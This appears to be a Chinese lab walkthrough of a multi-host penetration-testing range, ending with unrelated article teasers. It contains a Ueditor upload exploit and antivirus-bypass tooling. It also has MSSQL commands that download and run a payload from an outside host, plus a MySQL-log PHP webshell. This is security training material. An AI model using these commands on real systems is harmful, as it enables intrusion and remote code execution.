暗月ACK靶场 WP

news2024/11/23 8:17:48

环境搭建

https://mp.weixin.qq.com/s/VB4elHdrHNCmPDP_ktcLRg

https://www.bilibili.com/video/BV1264y187St?spm_id_from=333.1007.top_right_bar_window_history.content.click

按照文章拓扑根据实际情况搭建好,web2的其中一个网卡需要自己调一下ip

image-20221227150847125

1、把 12server-web1 中 C:Hws.com/Hws/HostMaster/wwwroot/www.ackmoon.com/web/HdhApp.config 的 ip 地址换成 12server-data1 的地址

2、攻击机绑定host文件,192.168.59.130 ackmoon.com

挑战开始

任务:拿到五个主机权限

信息搜集

image-20221227153222663

开了一些端口,先看web服务,是一个HDH网站管理系统(HDHCMS),查看历史漏洞没有发现有用的,访问其他的的web服务也没发现,只能使劲撸这个cms了

image-20221227153316139

后台路径:http://ackmoon.com/admin/login.aspx,爆破之后没发现弱口令,但是可以自己注册用户

image-20221227154435236

登录发现一些信息,物理路径、数据库、上传目录、编辑器

image-20221227154553453

Ueditor漏洞利用

Ueditor 1.4.3有个文件上传漏洞,具体操作如下:

使用冰蝎和一张图片制作图片马

image-20221227161535092

本地写一个上传木马的脚本

<form action="http://ackmoon.com/admin/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

将图片马上传到服务器上,开启http服务,木马的路径为 http://1.12.x.x/ok.png?.aspx,点击上传会返回shell的地址

image-20221227161934156image-20230128135206826

使用冰蝎连接,查看权限后发现权限很低,得用cs进行提权才能找flag等操作

image-20221227162156625

image-20221227163711934

CS提权横向

./teamserver 1.12.x.x 123456   客户端填好服务器地址和密码连接即可

上传的马执行直接没,猜测应该是360杀掉了,登录靶机一看好家伙,全给我删了。就连powershell执行都被拦截了

image-20230104103844258

继续研究了几天发现之前的掩日已经绕不过360,只能找别的办法,后面在github上找了几个Bypass的cs插件,发现其中一个可以绕过360的检测,地址为 https://github.com/cseroad/bypassAV。(后续补充一下免杀的学习内容)

按作者的使用教程生成木马,冰蝎占用内存较大(当你的电脑开着几个虚拟机和应用时内存会不够用)执行命令有时候会失败,所以新增了一个aspx一句话用蚁剑连接。将木马上传到 C:/Windows/Temp 目录下,其他目录因为权限问题可能上传不了。蚁剑执行木马,360也没有拦截的记录,成功在cs获得shell。

image-20230104110117974

接下来就是提权,推荐插件 https://github.com/d3ckx1/OLa,内集成多个提权插件,用烂土豆(Rotten Potato) MS16-075成功提权到SYSTEM权限

image-20230104134226417

一般来说得到SYSTEM权限可以看看主机有没有开启3389,新增一个用户登录就行,但是这个靶机没有开启,利用这个靶机当作跳板进行内网渗透即可。

查看网卡信息可知主机为双网卡,我们现在处于192.168.59.1/24这个网段,下一个网段是192.168.22.1/24,需要在此网段寻找其他的机子。

image-20230104143436063

查看主机的arp表可以获取处于同一网段的主机,发现了192.168.22.129、133两个主机,使用该主机也都ping通,存活状态

image-20230104150812328

之前在蚁剑中查看数据库文件的时候看到过133的主机ip,也就是说改站点和133的主机是站库分离,133专门运行数据库,为sqlserver。账号密码为:sa:pass123@.com

image-20230104153307155

添加socks代理进入内网,ip为cs服务端的ip,端口4567

image-20230104150722322

mssql获取权限

本地使用Proxifier工具连接代理服务器,再使用数据库连接工具连接133的数据库,通过数据库getshell

查看xp_cmdshell的状态

exec sp_configure;

image-20230104164231608

按理来说应该是关闭的,但是这里显示已经开启了,我们直接执行命令即可。原本想通过cs生成的powershell命令直接上线主机但是一直没反应,查看进程发现一个火绒再运行,登录靶机一看全被拦截了

image-20230104171802867

image-20230104171943617

绕过方式见:https://xz.aliyun.com/t/9265,免杀木马制作:https://github.com/xinghe0/python-shellcode-loader

#开启相应的权限
exec sp_configure 'show advanced options', 1; 
RECONFIGURE;  
exec sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

#移动sethc
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\certutil.exe' ,'c:\windows\temp\sethc.exe';

#下载免杀木马
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\Temp\sethc.exe -urlcache -split -f "http://1.x.x.x:4446/ob.exe" C:\Windows\Temp\ob.exe';

#运行木马
exec master..xp_cmdshell 'C:/windows/temp/ob.exe';

成功上线cs

image-20230105141001593

权限太低,继续烂土豆(Rotten Potato) MS16-075提权,到这里已经拿下133的主机了,查看路由表也是发现了前面web那台arp缓存的另一台主机ip

192.168.22.129的

image-20230105143157543

image-20230105144151918

JWT+mysql日志getshell

使用fscan进行扫描的时候发现129运行着web服务

image-20230105145249688

浏览器添加代理后访问129,访问web站点

image-20230104152034978

这里考察的是jwt的攻击方式,文章见:https://mp.weixin.qq.com/s/WvVgavjJMXSZQsVFtHEOhA?vid=1688855618368326&deviceid=e41dee7e-b83b-4610-8a9a-e648ac6ca813&version=4.0.20.6020&platform=win

试了修改用户名admin重新生成x-token来替换demo用户绕过,发现这个系统校验签名。又试了将alg设置为 None 重新签名发送也失败了。只剩下了爆破密钥的方式,但是字典看了别人的解析才知道是kali里面的rockyou.txt

爆破工具:https://github.com/ticarpi/jwt_tool,密钥为:Qweasdzxc5

image-20230105164501156

后面以为这个密钥是突破jwt的关键点,没想到这个靶场把这个密钥设置为http://192.168.22.129/phpmyadmin4.8.5/index.php的登录密码,感觉逻辑上有些迷。登录后就是mysql日志 getshell那一套。

image-20230128151738207

#查看日志路径、开启日志、设置日志文件、写入木马
SHOW VARIABLES LIKE 'general%' 
SET GLOBAL general_log='ON' 
SET GLOBAL general_log_file='C:/phpStudy_pro/WWW/s.php' 
SELECT '<?php @eval($_POST["a"]);?>'

蚁剑连接(挂代理,后续需要和129进行交互的都要挂上代理),发现新网段,并且不出网

image-20230128153344714

在cs上新建一个正向监听器并生成木马(beacon tcp)

image-20230128163507928

用蚁剑上传到服务器执行,cs转发,成功获取shell

5.exe  #在服务器中执行
connect 192.168.22.129 443  #在128会话中执行

image-20230128163733182

shell ipconfig /all   # 发现主机在域内,域名为ack123.com
shell ping ack123.com  #定位域控的ip为10.10.10.135

image-20230128170329865

SPN利用

因环境问题没法复现,题解参考:https://blog.csdn.net/qq_38850916/article/details/124801004 的kerberost攻击部分

总结

该靶机在搭建的时候会有部分问题,不知道是不是靶机主后续又对其进行修改,但是其中的免杀、代理等内容还是很贴切实战的。自己对内网域渗透这部分了解的还不够透彻,毕竟也不是专门搞红队的,以后若有机会会多多接触。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/189176.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

第五届字节跳动青训营 前端进阶学习笔记(十)Webpack基础

文章目录前言什么是Webpack1.Webpack概述2.Webpack基本使用Webpack打包核心流程1.webpack需要做的事情2.Webpack的使用3.处理CSS4.接入babel5.生成HTML6.HMR7.Tree-ShakingLoader1.Loader的主要特性2.常见Loader总结前言 课程重点&#xff1a; 什么是WebpackWebpack打包核心流…

本地启动打包后文件

本地启动打包后文件在 vs code 扩展中安装 Live Server配置 Live Server在 vs code 扩展中安装 Live Server 点击安装 Live Server 配置 Live Server VS Code setting.json 中配置 Vue/React 打包后文件夹 build/dist 为服务器的根目录 "liveServer.settings.root"…

AOP实例 – 环绕增强 日志记录

AOP实例 – 环绕增强 日志记录需求&#xff1a;记录图书的service层的日志操作&#xff0c;到数据库1. 创建商品日志记录表 Book_Log2. 完成日志记录表的插入逻辑3. 环绕增强搜集日志记录参数&#xff0c;并测试4. 环绕增强调用日志记录表的插入逻辑&#xff0c;完成日志记录功…

【目标检测论文解读复现NO.29】基于YOLO-ST的安全帽佩戴精确检测算法

前言此前出了目标改进算法专栏&#xff0c;但是对于应用于什么场景&#xff0c;需要什么改进方法对应与自己的应用场景有效果&#xff0c;并且多少改进点能发什么水平的文章&#xff0c;为解决大家的困惑&#xff0c;此系列文章旨在给大家解读最新目标检测算法论文&#xff0c;…

Spire.Barcode 5.1.0 for Java Patch

Spire.Barcode for Java是专门为开发人员设计的专业条码组件&#xff0c;用于在 Java 应用程序&#xff08;J2SE 和 J2EE&#xff09;上生成、读取和扫描 一维和二维条码。开发人员和程序员可以使用 Spire.Barcode 快速轻松地将企业级条码格式添加到他们的 Java 应用程序中。需…

【数字逻辑】逻辑函数式化简为其他形式

以 F&#xff08;A,B,C&#xff09;ABA‾CF&#xff08;A,B,C&#xff09; AB\overline{\rm A}CF&#xff08;A,B,C&#xff09;ABAC 为例&#xff0c;说明如何将与或式转换为其它类型的表达式。

CE认证和CCC认证区别?

CE认证和CCC认证区别? 参考链接:https://baijiahao.baidu.com/s?id=1728784934635704528&wfr=spider&for=pc CE认证和CCC认证有什么区别? 我发现我的很多朋友对此并不了解。 同时我发现很多产品在很多产品包装上都通过了CCC和CE认证,所以可能会引起没有做过产品…

硬件 -CPU工作原理

1.地址空间一个处理器能够访问&#xff08;读写&#xff09;的存储空间有限&#xff0c;我们称空间为地址空间&#xff0c;一般来说N位地址总线的处理器的地址空间是2的N次方。CPU从内存中取数据&#xff0c;先发地址&#xff0c;内存收到后&#xff0c;发送地址所在的数据。2.…

蓝奥声无线同步数据传输技术在物联网方面应用的优势

随着物联网技术的发展&#xff0c;其应用场景已经从简单的商品和服务扩展到广泛的社会和行业。当前&#xff0c;世界各地都在努力通过技术推动经济增长。对于许多行业来说&#xff0c;物联网技术的应用无疑将是一个新的增长机会。同时&#xff0c;物联网将推动社会结构从“制造…

Red Hat Linux 命令Crontab的使用方法

Red Hat Linux 命令Crontab的使用方法1 cron是一个linux下的定时执行工具&#xff0c;可以在无需人工干预的情况下运行作业。由于Cron 是Linux的内置服务&#xff0c;但它不自动起来&#xff0c;可以用以下的方法启动、关闭这个服务: /sbin/service crond start //启动服务 /…

C++的三大特性之继承

目录 一 继承的概念 代码&#xff1a; 总结&#xff1a; 二 继承中的关系 三 继承中的作用域问题 什么是域&#xff1f; 隐藏&#xff1a; 隐藏的场景&#xff1a; 总结 四 赋值兼容原则 什么是赋值兼容原则&#xff1f; 与平时强制类型转换的区别 这一个赋值兼容原则…

编译原理学习笔记18——语义分析和中间代码生成3

编译原理学习笔记18——语义分析和中间代码生成318.1 布尔表达式及其计算18.2 按数值表示法翻译布尔表达式18.3 带优化翻译布尔表达式18.1 布尔表达式及其计算 布尔表达式及其用途 计算布尔表达式的两种方法 计算布尔表达式的两种方法 18.2 按数值表示法翻译布尔表达式 数…

toString()、String.valueOf、(String)强转,有啥区别?

TOC 首先我们看这三头货&#xff0c;什么toString()、String.valueOf、(String)强转&#xff1f;有啥区别&#xff1f;就问你是不是很像&#xff0c;是不是都有一个String&#xff1f; 说白了&#xff0c;这三个都是将XX给变成String&#xff0c;简称变身String的方法 接下来一…

IDEA maven使用详解

前提 确保本地安装了maven 以一个模块工程为例&#xff0c;内部包含了许多maven项目 生命周期 这是全部的生命周期 其中&#xff0c;常用的生命周期的各个功能为&#xff1a; (clean生命周期)mvn clean清理target (default生命周期①)mvn validate验证项目为maven项目&a…

自然语言处理的进阶之路

1、隐马尔可夫链路一般较短原因 连乘链路太长&#xff0c;会导致数据稀疏&#xff0c;零频词太多 2、零频问题的一般解决方案 平滑/回退/差值 当n设置较小时&#xff0c;仍然会存在oov问题&#xff08;语料中未出现的词&#xff09; 2.1、平滑 2.1.1、加1平滑/拉普拉斯平…

Maven初级(一)

目录 一. Maven概述 1.1 Maven是什么 1.2 Maven的作用 1.2.1 项目构建 1.2.2 依赖管理 1.2.3 统一项目结构 1.3 Maven模型 1.3.1 插件 1.3.2 项目对象模型 1.3.3 依赖管理模型 二. Maven基础概念 2.1 仓库&#xff1a; 2.2 仓库分类 2.2.2 远程仓库(私服) 中央仓…

Python继承的优缺点

推出继承的初衷是让新手顺利使用只有专家才能设计出来的框架&#xff01;子类化内置类型的问题在Python2.2之前&#xff0c;内置类型不能子类化&#xff0c;如list、dict等。在Python2.2之后&#xff0c;内置类型可以子类化了&#xff0c;但是要注意的是&#xff1a;内置类型&a…

Individual tree segmentation and tree-counting using supervised clustering

ABSTRACT 个体树木分割 (ITS) 或树木计数是精准林业和农业过程中的一项基础工作。与费时费力的人工检查不同&#xff0c;计算机视觉在基于无人机 (UAV) 的应用中显示出巨大的前景&#xff1b;此类应用之一包括森林资源清单中的自动树木计数问题。然而&#xff0c;由于树冠冠层…

深度学习性能评估指标介绍

首先是相关数据描述。假设原始样本中有两类数据&#xff0c;其中&#xff1a;总共有P个类别为1的样本&#xff0c;假设类别1为正例总共有N个类别为0的样本&#xff0c;假设类别0为负例经过分类后&#xff1a;有TP个类别为1的样本被系统正确判定为类别1&#xff0c;FN个类别为1的…

【哈希表】leetcode1. 两数之和(C/C++/Java/Python/Js)

leetcode1. 两数之和1 题目2 思路3 代码3.1 C版本3.2 C版本3.3 Java版本3.4 Python版本3.5 JavaScript版本4 总结1 题目 题源链接 给定一个整数数组 nums 和一个整数目标值 target&#xff0c;请你在该数组中找出 和为目标值 target 的那 两个 整数&#xff0c;并返回它们的数…